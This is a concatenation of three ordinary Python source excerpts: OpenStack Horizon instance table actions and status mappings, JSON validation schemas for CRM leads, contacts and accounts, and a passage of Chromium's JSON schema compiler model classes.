return urls.reverse(self.url, args=[instance_id,
keypair_name])
class AssociateIP(policy.PolicyTargetMixin, tables.LinkAction):
name = "associate"
verbose_name = _("Associate Floating IP")
url = "horizon:project:floating_ips:associate"
classes = ("ajax-modal",)
icon = "link"
policy_rules = (("network", "update_floatingip"),)
def allowed(self, request, instance):
if not api.base.is_service_enabled(request, 'network'):
return False
if not api.neutron.floating_ip_supported(request):
return False
if api.neutron.floating_ip_simple_associate_supported(request):
return False
if instance.status == "ERROR":
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "floating":
return False
return not is_deleting(instance)
def get_link_url(self, datum):
base_url = urls.reverse(self.url)
next_url = self.table.get_full_url()
params = {
"instance_id": self.table.get_object_id(datum),
workflows.IPAssociationWorkflow.redirect_param_name: next_url}
params = urlencode(params)
return "?".join([base_url, params])
class DisassociateIP(tables.LinkAction):
name = "disassociate"
verbose_name = _("Disassociate Floating IP")
url = "horizon:project:instances:disassociate"
classes = ("btn-disassociate", 'ajax-modal')
policy_rules = (("network", "update_floatingip"),)
action_type = "danger"
def allowed(self, request, instance):
if not api.base.is_service_enabled(request, 'network'):
return False
if not api.neutron.floating_ip_supported(request):
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "floating":
return not is_deleting(instance)
return False
class UpdateMetadata(policy.PolicyTargetMixin, tables.LinkAction):
name = "update_metadata"
verbose_name = _("Update Metadata")
ajax = False
icon = "pencil"
attrs = {"ng-controller": "MetadataModalHelperController as modal"}
policy_rules = (("compute", "os_compute_api:server-metadata:update"),)
def __init__(self, attrs=None, **kwargs):
kwargs['preempt'] = True
super(UpdateMetadata, self).__init__(attrs, **kwargs)
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
self.attrs['ng-click'] = (
"modal.openMetadataModal('instance', '%s', true, 'metadata')"
% instance_id)
return "javascript:void(0);"
def allowed(self, request, instance=None):
return (instance and
instance.status.lower() != 'error')
def instance_fault_to_friendly_message(instance):
fault = getattr(instance, 'fault', {})
message = fault.get('message', _("Unknown"))
default_message = _("Please try again later [Error: %s].") % message
fault_map = {
'NoValidHost': _("There is not enough capacity for this "
"flavor in the selected availability zone. "
"Try again later or select a different availability "
"zone.")
}
return fault_map.get(message, default_message)
def get_instance_error(instance):
if instance.status.lower() != 'error':
return None
message = instance_fault_to_friendly_message(instance)
preamble = _('Failed to perform requested operation on instance "%s", the '
'instance has an error status') % instance.name or instance.id
message = string_concat(preamble, ': ', message)
return message
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, instance_id):
instance = api.nova.server_get(request, instance_id)
try:
instance.full_flavor = api.nova.flavor_get(request,
instance.flavor["id"])
except Exception:
exceptions.handle(request,
_('Unable to retrieve flavor information '
'for instance "%s".') % instance_id,
ignore=True)
try:
api.network.servers_update_addresses(request, [instance])
except Exception:
exceptions.handle(request,
_('Unable to retrieve Network information '
'for instance "%s".') % instance_id,
ignore=True)
error = get_instance_error(instance)
if error:
messages.error(request, error)
return instance
class StartInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "start"
classes = ('btn-confirm',)
policy_rules = (("compute", "os_compute_api:servers:start"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Start Instance",
u"Start Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Started Instance",
u"Started Instances",
count
)
def allowed(self, request, instance):
return ((instance is None) or
(instance.status in ("SHUTDOWN", "SHUTOFF", "CRASHED")))
def action(self, request, obj_id):
api.nova.server_start(request, obj_id)
class StopInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "stop"
policy_rules = (("compute", "os_compute_api:servers:stop"),)
help_text = _("The instance(s) will be shut off.")
action_type = "danger"
@staticmethod
def action_present(count):
return npgettext_lazy(
"Action to perform (the instance is currently running)",
u"Shut Off Instance",
u"Shut Off Instances",
count
)
@staticmethod
def action_past(count):
return npgettext_lazy(
"Past action (the instance is currently already Shut Off)",
u"Shut Off Instance",
u"Shut Off Instances",
count
)
def allowed(self, request, instance):
return (instance is None or
(get_power_state(instance) in ("RUNNING", "SUSPENDED") and
not is_deleting(instance)))
def action(self, request, obj_id):
api.nova.server_stop(request, obj_id)
class LockInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "lock"
policy_rules = (("compute", "os_compute_api:os-lock-server:lock"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Lock Instance",
u"Lock Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Locked Instance",
u"Locked Instances",
count
)
# to only allow unlocked instances to be locked
def allowed(self, request, instance):
if getattr(instance, 'locked', False):
return False
if not api.nova.extension_supported('AdminActions', request):
return False
if not api.nova.is_feature_available(request, "locked_attribute"):
return False
return True
def action(self, request, obj_id):
api.nova.server_lock(request, obj_id)
class UnlockInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "unlock"
policy_rules = (("compute", "os_compute_api:os-lock-server:unlock"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Unlock Instance",
u"Unlock Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Unlocked Instance",
u"Unlocked Instances",
count
)
# to only allow locked instances to be unlocked
def allowed(self, request, instance):
if not getattr(instance, 'locked', True):
return False
if not api.nova.extension_supported('AdminActions', request):
return False
if not api.nova.is_feature_available(request, "locked_attribute"):
return False
return True
def action(self, request, obj_id):
api.nova.server_unlock(request, obj_id)
class AttachVolume(tables.LinkAction):
name = "attach_volume"
verbose_name = _("Attach Volume")
url = "horizon:project:instances:attach_volume"
classes = ("ajax-modal",)
policy_rules = (
("compute", "os_compute_api:os-volumes-attachments:create"),)
# This action should be disabled if the instance
# is not active, or the instance is being deleted
# or cinder is not enabled
def allowed(self, request, instance=None):
return (instance.status in ("ACTIVE") and
not is_deleting(instance) and
api.cinder.is_volume_service_enabled(request))
class DetachVolume(AttachVolume):
name = "detach_volume"
verbose_name = _("Detach Volume")
url = "horizon:project:instances:detach_volume"
policy_rules = (
("compute", "os_compute_api:os-volumes-attachments:delete"),)
# This action should be disabled if the instance
# is not active, or the instance is being deleted
# or cinder is not enabled
def allowed(self, request, instance=None):
return (instance.status in ("ACTIVE") and
not is_deleting(instance) and
api.cinder.is_volume_service_enabled(request))
class AttachInterface(policy.PolicyTargetMixin, tables.LinkAction):
name = "attach_interface"
verbose_name = _("Attach Interface")
classes = ("btn-confirm", "ajax-modal")
url = "horizon:project:instances:attach_interface"
policy_rules = (("compute", "os_compute_api:os-attach-interfaces"),)
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES or
instance.status == 'SHUTOFF') and
not is_deleting(instance) and
api.base.is_service_enabled(request, 'network'))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urls.reverse(self.url, args=[instance_id])
class DetachInterface(policy.PolicyTargetMixin, tables.LinkAction):
name = "detach_interface"
verbose_name = _("Detach Interface")
classes = ("btn-confirm", "ajax-modal")
url = "horizon:project:instances:detach_interface"
policy_rules = (("compute", "os_compute_api:os-attach-interfaces:delete"),)
def allowed(self, request, instance):
if not api.base.is_service_enabled(request, 'network'):
return False
if is_deleting(instance):
return False
if (instance.status not in ACTIVE_STATES and
instance.status != 'SHUTOFF'):
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "fixed":
return True
return False
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urls.reverse(self.url, args=[instance_id])
def get_ips(instance):
template_name = 'project/instances/_instance_ips.html'
ip_groups = {}
for ip_group, addresses in instance.addresses.items():
ips = [addr['addr'] for addr in addresses]
ips.sort(key=lambda ip: netaddr.IPAddress(ip).version)
ip_groups[ip_group] = ips
context = {
"ip_groups": ip_groups,
}
return template.loader.render_to_string(template_name, context)
def get_flavor(instance):
if hasattr(instance, "full_flavor"):
template_name = 'project/instances/_instance_flavor.html'
size_ram = sizeformat.mb_float_format(instance.full_flavor.ram)
if instance.full_flavor.disk > 0:
size_disk = sizeformat.diskgbformat(instance.full_flavor.disk)
else:
size_disk = _("%s GB") % "0"
context = {
"name": instance.full_flavor.name,
"id": instance.id,
"size_disk": size_disk,
"size_ram": size_ram,
"vcpus": instance.full_flavor.vcpus,
"flavor_id": instance.full_flavor.id
}
return template.loader.render_to_string(template_name, context)
return _("Not available")
def get_keyname(instance):
if hasattr(instance, "key_name"):
keyname = instance.key_name
return keyname
return _("Not available")
def get_power_state(instance):
return POWER_STATES.get(getattr(instance, "OS-EXT-STS:power_state", 0), '')
STATUS_DISPLAY_CHOICES = (
("deleted", pgettext_lazy("Current status of an Instance", u"Deleted")),
("active", pgettext_lazy("Current status of an Instance", u"Active")),
("shutoff", pgettext_lazy("Current status of an Instance", u"Shutoff")),
("suspended", pgettext_lazy("Current status of an Instance",
u"Suspended")),
("paused", pgettext_lazy("Current status of an Instance", u"Paused")),
("error", pgettext_lazy("Current status of an Instance", u"Error")),
("resize", pgettext_lazy("Current status of an Instance",
u"Resize/Migrate")),
("verify_resize", pgettext_lazy("Current status of an Instance",
u"Confirm or Revert Resize/Migrate")),
("revert_resize", pgettext_lazy(
"Current status of an Instance", u"Revert Resize/Migrate")),
("reboot", pgettext_lazy("Current status of an Instance", u"Reboot")),
("hard_reboot", pgettext_lazy("Current status of an Instance",
u"Hard Reboot")),
("password", pgettext_lazy("Current status of an Instance", u"Password")),
("rebuild", pgettext_lazy("Current status of an Instance", u"Rebuild")),
("migrating", pgettext_lazy("Current status of an Instance",
u"Migrating")),
("build", pgettext_lazy("Current status of an Instance", u"Build")),
("rescue", pgettext_lazy("Current status of an Instance", u"Rescue")),
("soft-delete", pgettext_lazy("Current status of an Instance",
u"Soft Deleted")),
("shelved", pgettext_lazy("Current status of an Instance", u"Shelved")),
("shelved_offloaded", pgettext_lazy("Current status of an Instance",
u"Shelved Offloaded")),
# these vm states are used when generating CSV usage summary
("building", pgettext_lazy("Current status of an Instance", u"Building")),
("stopped", pgettext_lazy("Current status of an Instance", u"Stopped")),
("rescued", pgettext_lazy("Current status of an Instance", u"Rescued")),
("resized", pgettext_lazy("Current status of an Instance", u"Resized")),
)
TASK_DISPLAY_NONE = pgettext_lazy("Task status of an Instance", u"None")
# Mapping of task states taken from Nova's nova/compute/task_states.py
TASK_DISPLAY_CHOICES = (
("scheduling", pgettext_lazy("Task status of an Instance",
u"Scheduling")),
("block_device_mapping", pgettext_lazy("Task status of an Instance",
u"Block Device Mapping")),
("networking", pgettext_lazy("Task status of an Instance",
u"Networking")),
("spawning", pgettext_lazy("Task status of an Instance", u"Spawning")),
("image_snapshot", pgettext_lazy("Task status of an Instance",
u"Snapshotting")),
("image_snapshot_pending", pgettext_lazy("Task status of an Instance",
u"Image Snapshot Pending")),
("image_pending_upload", pgettext_lazy("Task status of an Instance",
u"Image Pending Upload")),
("image_uploading", pgettext_lazy("Task status of an Instance",
u"Image Uploading")),
("image_backup", pgettext_lazy("Task status of an Instance",
u"Image Backup")),
("updating_password", pgettext_lazy("Task status of an Instance",
u"Updating Password")),
("resize_prep", pgettext_lazy("Task status of an Instance",
u"Preparing Resize or Migrate")),
("resize_migrating", pgettext_lazy("Task status of an Instance",
u"Resizing or Migrating")),
("resize_migrated", pgettext_lazy("Task status of an Instance",
u"Resized or Migrated")),
("resize_finish", pgettext_lazy("Task status of an Instance",
u"Finishing Resize or Migrate")),
("resize_reverting", pgettext_lazy("Task status of an Instance",
u"Reverting Resize or Migrate")),
("resize_confirming", pgettext_lazy("Task status of an Instance",
u"Confirming Resize or Migrate")),
("rebooting", pgettext_lazy("Task status of an Instance", u"Rebooting")),
("reboot_pending", pgettext_lazy("Task status of an Instance",
u"Reboot Pending")),
("reboot_started", pgettext_lazy("Task status of an Instance",
u"Reboot Started")),
("rebooting_hard", pgettext_lazy("Task status of an Instance",
u"Hard Rebooting")),
("reboot_pending_hard", pgettext_lazy("Task status of an Instance",
u"Hard Reboot Pending")),
("reboot_started_hard", pgettext_lazy("Task status of an Instance",
u"Hard Reboot Started")),
("pausing", pgettext_lazy("Task status of an Instance", u"Pausing")),
("unpausing", pgettext_lazy("Task status of an Instance", u"Resuming")),
("suspending", pgettext_lazy("Task status of an Instance",
u"Suspending")),
("resuming", pgettext_lazy("Task status of an Instance", u"Resuming")),
("powering-off", pgettext_lazy("Task status of an Instance",
u"Powering Off")),
("powering-on", pgettext_lazy("Task status of an Instance",
u"Powering On")),
("rescuing", pgettext_lazy("Task status of an Instance", u"Rescuing")),
("unrescuing", pgettext_lazy("Task status of an Instance",
u"Unrescuing")),
("rebuilding", pgettext_lazy("Task status of an Instance",
u"Rebuilding")),
("rebuild_block_device_mapping", pgettext_lazy(
"Task status of an Instance", u"Rebuild Block Device Mapping")),
("rebuild_spawning", pgettext_lazy("Task status of an Instance",
u"Rebuild Spawning")),
("migrating", pgettext_lazy("Task status of an Instance", u"Migrating")),
("deleting", pgettext_lazy("Task status of an Instance", u"Deleting")),
("soft-deleting", pgettext_lazy("Task status of an Instance",
u"Soft Deleting")),
("restoring", pgettext_lazy("Task status of an Instance", u"Restoring")),
("shelving", pgettext_lazy("Task status of an Instance", u"Shelving")),
("shelving_image_pending_upload", pgettext_lazy(
"Task status of an Instance", u"Shelving Image Pending Upload")),
("shelving_image_uploading", pgettext_lazy("Task status of an Instance",
u"Shelving Image Uploading")),
("shelving_offloading", pgettext_lazy("Task status of an Instance",
u"Shelving Offloading")),
("unshelving", pgettext_lazy("Task status of an Instance",
u"Unshelving")),
)
POWER_DISPLAY_CHOICES = (
("NO STATE", pgettext_lazy("Power state of an Instance", u"No State")),
("RUNNING", pgettext_lazy("Power state of an Instance", u"Running")),
("BLOCKED", pgettext_lazy("Power state of an Instance", u"Blocked")),
("PAUSED", pgettext_lazy("Power state of an Instance", u"Paused")),
("SHUTDOWN", pgettext_lazy("Power state of an Instance", u"Shut Down")),
("SHUTOFF", pgettext_lazy("Power state of an Instance", u"Shut Off")),
("CRASHED", pgettext_lazy("Power state of an Instance", u"Crashed")),
("SUSPENDED", pgettext_lazy("Power state of an Instance", u"Suspended")),
("FAILED", pgettext_lazy("Power state of an Instance", u"Failed")),
("BUILDING", pgettext_lazy("Power state of an Instance", u"Building")),
)
INSTANCE_FILTER_CHOICES = (
('uuid', _("Instance ID ="), True),
('name', _("Instance Name ="), True),
('image', _("Image ID ="), True),
('image_name', _("Image Name ="), True),
('ip', _("IPv4 Address ="), True),
('ip6', _("IPv6 Address ="), True, None,
api.neutron.is_enabled_by_config('enable_ipv6')),
('flavor', _("Flavor ID ="), True),
('flavor_name', _("Flavor Name ="), True),
('key_name', _("Key Pair Name ="), True),
('status', _("Status ="), True),
('availability_zone', _("Availability Zone ="), True),
('changes-since', _("Changes Since"), True,
_("Filter by an ISO 8061 formatted time, e.g. 2016-06-14T06:27:59Z")),
('vcpus', _("vCPUs ="), True),
)
class InstancesFilterAction(tables.FilterAction):
filter_type = "server"
filter_choices = INSTANCE_FILTER_CHOICES
def render_locked(instance):
if not hasattr(instance, 'locked'):
return ""
if instance.locked:
icon_classes = "fa fa-fw fa-lock"
help_tooltip = _("This instance is currently locked. To enable more "
"actions on it, please unlock it by selecting Unlock "
"Instance from the actions menu.")
else:
icon_classes = "fa fa-fw fa-unlock text-muted"
help_tooltip = _("This instance is unlocked.")
locked_status = ('<span data-toggle="tooltip" title="{}" class="{}">'
'</span>').format(help_tooltip, icon_classes)
return mark_safe(locked_status)
def get_server_detail_link(obj, request):
return get_url_with_pagination(request,
InstancesTable._meta.pagination_param,
InstancesTable._meta.prev_pagination_param,
'horizon:project:instances:detail',
obj.id)
class InstancesTable(tables.DataTable):
TASK_STATUS_CHOICES = (
(None, True),
("none", True)
)
STATUS_CHOICES = (
("active", True),
("shutoff", True),
("suspended", True),
("paused", True),
("error", False),
("rescue", True),
("shelved", True),
("shelved_offloaded", True),
)
name = tables.WrappingColumn("name",
link=get_server_detail_link,
verbose_name=_("Instance Name"))
image_name = tables.WrappingColumn("image_name",
verbose_name=_("Image Name"))
ip = tables.Column(get_ips,
verbose_name=_("IP Address"),
attrs={'data-type': "ip"})
flavor = tables.Column(get_flavor,
sortable=False,
verbose_name=_("Flavor"))
keypair = tables.Column(get_keyname, verbose_name=_("Key Pair"))
status = tables.Column("status",
filters=(title, filters.replace_underscores),
verbose_name=_("Status"),
status=True,
status_choices=STATUS_CHOICES,
display_choices=STATUS_DISPLAY_CHOICES)
locked = tables.Column(render_locked,
verbose_name="",
sortable=False)
az = tables.Column("availability_zone",
verbose_name=_("Availability Zone"))
task = tables.Column("OS-EXT-STS:task_state",
verbose_name=_("Task"),
empty_value=TASK_DISPLAY_NONE,
status=True,
status_choices=TASK_STATUS_CHOICES,
display_choices=TASK_DISPLAY_CHOICES)
state = tables.Column(get_power_state,
filters=(title, filters.replace_underscores),
verbose_name=_("Power State"),
display_choices=POWER_DISPLAY_CHOICES)
created = tables.Column("created",
verbose_name=_("Age"),
filters=(filters.parse_isotime,
filters.timesince_sortable),
attrs={'data-type': 'timesince'})
class Meta(object):
name = "instances"
verbose_name = _("Instances")
status_columns = ["status", "task"]
row_class = UpdateRow
table_actions_menu = (StartInstance, StopInstance, SoftRebootInstance)
launch_actions = ()
if getattr(settings, 'LAUNCH_INSTANCE_LEGACY_ENABLED', False):
launch_actions = (LaunchLink,) + launch_actions
if getattr(settings, 'LAUNCH_INSTANCE_NG_ENABLED', True):
launch_actions = (LaunchLinkNG,) + launch_actions
table_actions = launch_actions + (DeleteInstance,
InstancesFilterAction)
row_actions = (StartInstance, ConfirmResize, RevertResize,
CreateSnapshot, AssociateIP, DisassociateIP,
AttachInterface, DetachInterface, EditInstance,
AttachVolume, DetachVolume,
UpdateMetadata, DecryptInstancePassword,
EditInstanceSecurityGroups,
EditPortSecurityGroups,
ConsoleLink, LogLink,
RescueInstance, UnRescueInstance,
TogglePause, ToggleSuspend, ToggleShelve,
ResizeLink, LockInstance, UnlockInstance,
SoftRebootInstance, RebootInstance,
StopInstance, RebuildInstance, DeleteInstance)
| |
string_schema = {
'type': 'string',
'maxLength': 255,
'minLength': 1,
'blank': False,
'required': False
}
string_schema_allow_empty = {
'type': 'string',
'maxLength': 255,
'blank': True,
'required': False
}
array_of_strings_schema = {
'type': 'array',
'uniqueItems': True,
'items': [
string_schema
],
'required': False
}
string_schema_required = {
'type': 'string',
'maxLength': 255,
'minLength': 1,
'blank': False,
'required': True
}
boolean_schema = {
'type': 'boolean',
'required': False
}
integer_schema = {
'type': 'integer',
'minimum': 0,
'required': False
}
create_lead_schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'firstname': string_schema,
'lastname': string_schema,
'phone': string_schema,
'description': string_schema,
'leadsource': string_schema,
'title': string_schema,
'email': string_schema,
'company': string_schema,
'rating': string_schema,
'postalcode': string_schema,
'salutation': string_schema,
'industry': string_schema,
'street': string_schema,
'status': string_schema,
'isunreadbyowner': boolean_schema,
'city': string_schema,
'state': string_schema,
'country': string_schema,
'fax': string_schema,
'annualrevenue': integer_schema
}
}
contact_schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'phone': string_schema,
'email': string_schema,
'firstname': string_schema,
'lastname': string_schema_required,
'department': string_schema,
'mobilephone': string_schema,
'title': string_schema,
'lastmodifieddate': string_schema,
'accountid': string_schema,
'lastreferenceddate': string_schema,
'salutation': string_schema,
'name': string_schema,
'createdbyid': string_schema,
'ownerid': string_schema,
'photourl': string_schema,
'isdeleted': string_schema,
'isemailbounced': string_schema,
'hasoptedoutofemail': string_schema,
'lastvieweddate': string_schema,
'birthdate': string_schema,
'systemmodstamp': string_schema,
'leadsource': string_schema,
'createddate': string_schema,
'fax': string_schema,
'lastmodifiedbyid': string_schema,
'mailingstreet': string_schema
}
}
lead_schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
"firstname": string_schema,
"lastname": string_schema_required,
"phone": string_schema,
"description": string_schema,
"leadsource": string_schema,
"title": string_schema,
"email": string_schema,
"company": string_schema_required,
"rating": string_schema,
"postalcode": string_schema,
"salutation": string_schema,
"industry": string_schema,
"street": string_schema,
"status": string_schema_required,
"isunreadbyowner": boolean_schema,
"city": string_schema,
"state": string_schema,
"country": string_schema,
"fax": string_schema,
"annualrevenue": integer_schema
}
}
lead_schema_update = {
'type': 'object',
'additionalProperties': False,
'properties': {
"firstname": string_schema,
"lastname": string_schema,
"phone": string_schema,
"description": string_schema,
"leadsource": string_schema,
"title": string_schema,
"email": string_schema,
"company": string_schema,
"rating": string_schema,
"postalcode": string_schema,
"salutation": string_schema,
"industry": string_schema,
"street": string_schema,
"status": string_schema,
"isunreadbyowner": boolean_schema,
"city": string_schema,
"state": string_schema,
"country": string_schema,
"fax": string_schema,
"annualrevenue": integer_schema
}
}
account_schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
"name": string_schema_required,
"website": string_schema,
"phone": string_schema,
"billingstreet": string_schema,
"billingcity": string_schema,
"billingstate": string_schema,
"billingpostalcode": string_schema,
"billingcountry": string_schema,
"type": string_schema,
"annualrevenue": integer_schema,
"numberofemployees": integer_schema,
"description": string_schema,
"shippingstreet": string_schema,
"accountnumber": string_schema,
"fax": string_schema,
"rating": string_schema,
"ownership": string_schema,
"sic": string_schema,
"industry": string_schema
}
}
instance_key_schema = {
'enum': ['sfdc', 'sugar'],
'required': False
}
instance_element_schema = {
'type': 'object',
'properties': {
'id': integer_schema,
'name': string_schema,
'createdDate': integer_schema,
'updatedDate': integer_schema,
'key': instance_key_schema,
'description': string_schema,
'active': boolean_schema,
'deleted': boolean_schema,
'typeOauth': boolean_schema,
'trialAccount': boolean_schema,
'trialAccountDescription': string_schema,
'existingAccountDescription': string_schema,
'configDescription': string_schema,
'signupURL': string_schema,
'authenticationType': string_schema,
'hub': string_schema,
'transformationsEnabled': boolean_schema
}
}
instance_provision_schema = {
"type": "object",
"properties": {
"maxcachesize": integer_schema,
"element": instance_element_schema,
"providerData": {
"type": "object",
"properties": {
"code": string_schema,
},
'required': False
},
"configuration": {
"type": 'object',
'properties': {
"oauth.callback.url": string_schema,
"oauth.api.key": string_schema,
"oauth.api.secret": string_schema
},
'required': False
},
"tags": array_of_strings_schema,
"name": string_schema,
"valid": boolean_schema,
"channelname": string_schema,
"updateddate": integer_schema,
"id": integer_schema,
"cachetimetolive": integer_schema,
"token": string_schema,
"description": string_schema,
"cachingenabled": boolean_schema,
"createddate": integer_schema,
"disabled": boolean_schema
}
}
| |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os.path
from json_parse import OrderedDict
from memoize import memoize
class ParseException(Exception):
"""Thrown when data in the model is invalid.
"""
def __init__(self, parent, message):
hierarchy = _GetModelHierarchy(parent)
hierarchy.append(message)
Exception.__init__(
self, 'Model parse exception at:\n' + '\n'.join(hierarchy))
class Model(object):
"""Model of all namespaces that comprise an API.
Properties:
- |namespaces| a map of a namespace name to its model.Namespace
"""
def __init__(self):
self.namespaces = {}
def AddNamespace(self, json, source_file, include_compiler_options=False):
"""Add a namespace's json to the model and returns the namespace.
"""
namespace = Namespace(json,
source_file,
include_compiler_options=include_compiler_options)
self.namespaces[namespace.name] = namespace
return namespace
class Namespace(object):
"""An API namespace.
Properties:
- |name| the name of the namespace
- |description| the description of the namespace
- |unix_name| the unix_name of the namespace
- |source_file| the file that contained the namespace definition
- |source_file_dir| the directory component of |source_file|
- |source_file_filename| the filename component of |source_file|
- |platforms| if not None, the list of platforms that the namespace is
available to
- |types| a map of type names to their model.Type
- |functions| a map of function names to their model.Function
- |events| a map of event names to their model.Function
- |properties| a map of property names to their model.Property
- |compiler_options| the compiler_options dict, only not empty if
|include_compiler_options| is True
"""
def __init__(self, json, source_file, include_compiler_options=False):
self.name = json['namespace']
if 'description' not in json:
# TODO(kalman): Go back to throwing an error here.
print('%s must have a "description" field. This will appear '
'on the API summary page.' % self.name)
json['description'] = ''
self.description = json['description']
self.unix_name = UnixName(self.name)
self.source_file = source_file
self.source_file_dir, self.source_file_filename = os.path.split(source_file)
self.parent = None
self.platforms = _GetPlatforms(json)
toplevel_origin = Origin(from_client=True, from_json=True)
self.types = _GetTypes(self, json, self, toplevel_origin)
self.functions = _GetFunctions(self, json, self)
self.events = _GetEvents(self, json, self)
self.properties = _GetProperties(self, json, self, toplevel_origin)
self.compiler_options = (json.get('compiler_options', {})
if include_compiler_options else {})
class Origin(object):
"""Stores the possible origin of model object as a pair of bools. These are:
|from_client| indicating that instances can originate from users of
generated code (for example, function results), or
|from_json| indicating that instances can originate from the JSON (for
example, function parameters)
It is possible for model objects to originate from both the client and json,
for example Types defined in the top-level schema, in which case both
|from_client| and |from_json| would be True.
"""
def __init__(self, from_client=False, from_json=False):
if not from_client and not from_json:
raise ValueError('One of from_client or from_json must be true')
self.from_client = from_client
self.from_json = from_json
class Type(object):
"""A Type defined in the json.
Properties:
- |name| the type name
- |namespace| the Type's namespace
- |description| the description of the type (if provided)
- |properties| a map of property unix_names to their model.Property
- |functions| a map of function names to their model.Function
- |events| a map of event names to their model.Event
- |origin| the Origin of the type
- |property_type| the PropertyType of this Type
- |item_type| if this is an array, the type of items in the array
- |simple_name| the name of this Type without a namespace
- |additional_properties| the type of the additional properties, if any is
specified
"""
def __init__(self,
parent,
name,
json,
namespace,
origin):
self.name = name
self.namespace = namespace
self.simple_name = _StripNamespace(self.name, namespace)
self.unix_name = UnixName(self.name)
self.description = json.get('description', None)
self.origin = origin
self.parent = parent
self.instance_of = json.get('isInstanceOf', None)
# TODO(kalman): Only objects need functions/events/properties, but callers
# assume that all types have them. Fix this.
self.functions = _GetFunctions(self, json, namespace)
self.events = _GetEvents(self, json, namespace)
self.properties = _GetProperties(self, json, namespace, origin)
json_type = json.get('type', None)
if json_type == 'array':
self.property_type = PropertyType.ARRAY
self.item_type = Type(
self, '%sType' % name, json['items'], namespace, origin)
elif '$ref' in json:
self.property_type = PropertyType.REF
self.ref_type = json['$ref']
elif 'enum' in json and json_type == 'string':
self.property_type = PropertyType.ENUM
self.enum_values = [value for value in json['enum']]
elif json_type == 'any':
self.property_type = PropertyType.ANY
elif json_type == 'binary':
self.property_type = PropertyType.BINARY
elif json_type == 'boolean':
self.property_type = PropertyType.BOOLEAN
elif json_type == 'integer':
self.property_type = PropertyType.INTEGER
elif (json_type == 'double' or
json_type == 'number'):
self.property_type = PropertyType.DOUBLE
elif json_type == 'string':
self.property_type = PropertyType.STRING
elif 'choices' in json:
self.property_type = PropertyType.CHOICES
def generate_type_name(type_json):
if 'items' in type_json:
return '%ss' % generate_type_name(type_json['items'])
if '$ref' in type_json:
return type_json['$ref']
if 'type' in type_json:
return type_json['type']
return None
self.choices = [
Type(self,
generate_type_name(choice) or 'choice%s' % i,
choice,
namespace,
origin)
for i, choice in enumerate(json['choices'])]
elif json_type == 'object':
if not (
'isInstanceOf' in json or
'properties' in json or
'additionalProperties' in json or
'functions' in json or
'events' in json):
raise ParseException(self, name + " has no properties or functions")
self.property_type = PropertyType.OBJECT
additional_properties_json = json.get('additionalProperties', None)
if additional_properties_json is not None:
self.additional_properties = Type(self,
'additionalProperties',
additional_properties_json,
namespace,
origin)
else:
self.additional_properties = None
elif json_type == 'function':
self.property_type = PropertyType.FUNCTION
# Sometimes we might have an unnamed function, e.g. if it's a property
# of an object. Use the name of the property in that case.
function_name = json.get('name', name)
self.function = Function(self, function_name, json, namespace, origin)
else:
raise ParseException(self, 'Unsupported JSON type %s' % json_type)
class Function(object):
"""A Function defined in the API.
Properties:
- |name| the function name
- |platforms| if not None, the list of platforms that the function is
available to
- |params| a list of parameters to the function (order matters). A separate
parameter is used for each choice of a 'choices' parameter
- |description| a description of the function (if provided)
- |callback| the callback parameter to the function. There should be exactly
one
- |optional| whether the Function is "optional"; this only makes sense to be
present when the Function is representing a callback property
- |simple_name| the name of this Function without a namespace
- |returns| the return type of the function; None if the function does not
return a value
"""
def __init__(self,
parent,
name,
json,
namespace,
origin):
self.name = name
self.simple_name = _StripNamespace(self.name, namespace)
self.platforms = _GetPlatforms(json)
self.params = []
self.description = json.get('description')
self.callback = None
self.optional = json.get('optional', False)
self.parent = parent
self.nocompile = json.get('nocompile')
options = json.get('options', {})
self.conditions = options.get('conditions', [])
self.actions = options.get('actions', [])
self.supports_listeners = options.get('supportsListeners', True)
self.supports_rules = options.get('supportsRules', False)
def GeneratePropertyFromParam(p):
return Property(self, p['name'], p, namespace, origin)
self.filters = [GeneratePropertyFromParam(filter)
for filter in json.get('filters', [])]
callback_param = None
for param in json.get('parameters', []):
if param.get('type') == 'function':
if callback_param:
# No ParseException because the webstore has this.
# Instead, pretend all intermediate callbacks are properties.
self.params.append(GeneratePropertyFromParam(callback_param))
callback_param = param
else:
self.params.append(GeneratePropertyFromParam(param))
if callback_param:
self.callback = Function(self,
callback_param['name'],
callback_param,
namespace,
Origin(from_client=True))
self.returns = None
if 'returns' in json:
self.returns = Type(self,
'%sReturnType' % name,
json['returns'],
namespace,
origin)
class Property(object):
"""A property of a type OR a parameter to a function.
Properties:
- |name| name of the property as in the json. This shouldn't change since
it is the key used to access DictionaryValues
- |unix_name| the unix_style_name of the property. Used as variable name
- |optional| a boolean representing whether the property is optional
- |description| a description of the property (if provided)
- |type_| the model.Type of this property
- |simple_name| the name of this Property without a namespace
"""
def __init__(self, parent, name, json, namespace, origin):
"""Creates a Property from JSON.
"""
self.parent = parent
self.name = name
self._unix_name = UnixName(self.name)
self._unix_name_used = False
self.origin = origin
self.simple_name = _StripNamespace(self.name, namespace)
self.description = json.get('description', None)
self.optional = json.get('optional', None)
self.instance_of = json.get('isInstanceOf', None)
# HACK: only support very specific value types.
is_allowed_value = (
'$ref' not in json and
('type' not in json or json['type'] == 'integer'
or json['type'] == 'string'))
